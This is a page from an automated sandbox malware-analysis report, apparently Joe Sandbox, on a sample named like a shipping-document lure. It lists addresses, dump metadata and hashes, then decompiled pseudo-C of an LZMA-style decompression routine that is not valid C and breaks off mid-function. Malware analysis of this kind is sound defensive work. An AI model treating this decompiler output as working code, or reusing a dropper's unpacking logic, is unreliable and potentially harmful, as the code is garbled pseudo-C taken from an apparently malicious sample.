                                                0x00406f7b
                                                0x00406f7e
                                                0x00406f81
                                                0x00406f83
                                                0x00406f83
                                                0x00406f83
                                                0x00406f86
                                                0x00406f89
                                                0x00406f8c
                                                0x00406f8f
                                                0x00406f92
                                                0x00406f95
                                                0x00406f96
                                                0x00406f98
                                                0x00406f98
                                                0x00406f98
                                                0x00406f9b
                                                0x00406f9e
                                                0x00406fa1
                                                0x00406fa4
                                                0x00406fa4
                                                0x00406fa4
                                                0x00406fa7
                                                0x00406fa9
                                                0x00406fa9
                                                0x00000000
                                                0x00000000
                                                0x004071eb
                                                0x004071eb
                                                0x004071eb
                                                0x004071ef
                                                0x00000000
                                                0x00000000
                                                0x004071f5
                                                0x004071f8
                                                0x004071fb
                                                0x004071fe
                                                0x00407200
                                                0x00407200
                                                0x00407200
                                                0x00407203
                                                0x00407206
                                                0x00407209
                                                0x0040720c
                                                0x0040720f
                                                0x00407212
                                                0x00407213
                                                0x00407215
                                                0x00407215
                                                0x00407215
                                                0x00407218
                                                0x0040721b
                                                0x0040721e
                                                0x00407221
                                                0x00407224
                                                0x00407228
                                                0x0040722a
                                                0x0040722d
                                                0x00000000
                                                0x0040722f
                                                0x00406fac
                                                0x00406fac
                                                0x00000000
                                                0x00406fac
                                                0x0040722d
                                                0x00407462
                                                0x00407484
                                                0x0040748a
                                                0x0040748c
                                                0x00407493
                                                0x00407495
                                                0x0040749c
                                                0x004074a0
                                                0x00000000
                                                0x00406a91
                                                0x00407499
                                                0x00407499
                                                0x00000000
                                                0x00407499
                                                0x004072e6
                                                0x0040736c
                                                0x00407372
                                                0x00407375
                                                0x00407378
                                                0x0040737b
                                                0x0040737e
                                                0x00407381
                                                0x00407384
                                                0x00407387
                                                0x0040738d
                                                0x004073a6
                                                0x004073a9
                                                0x004073ac
                                                0x004073af
                                                0x004073b3
                                                0x004073b5
                                                0x004073b6
                                                0x004073b9
                                                0x0040738f
                                                0x0040738f
                                                0x00407397
                                                0x0040739c
                                                0x0040739e
                                                0x004073a1
                                                0x004073a1
                                                0x004073c3
                                                0x00000000
                                                0x004073c5
                                                0x00000000
                                                0x004073c5
                                                0x004073c3
                                                0x00000000
                                                0x00407238

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ebae6c99bd50000eb285df6155aedf615db6897555c34448d2050622d285009a
                                                • Instruction ID: 8a2c3c043c9bb5ba2b5721dff60c2e2798a6d81db984abdc297d3eb4e69e55d3
                                                • Opcode Fuzzy Hash: ebae6c99bd50000eb285df6155aedf615db6897555c34448d2050622d285009a
                                                • Instruction Fuzzy Hash: 11911170D04229CBEF28CF98C8947ADBBB1FB44305F14816ED856BB291C7786A86DF45
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00406F4A Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 98%
                                                			E00406F4A() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M004074A1))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4)); // executed
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8)); // executed
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
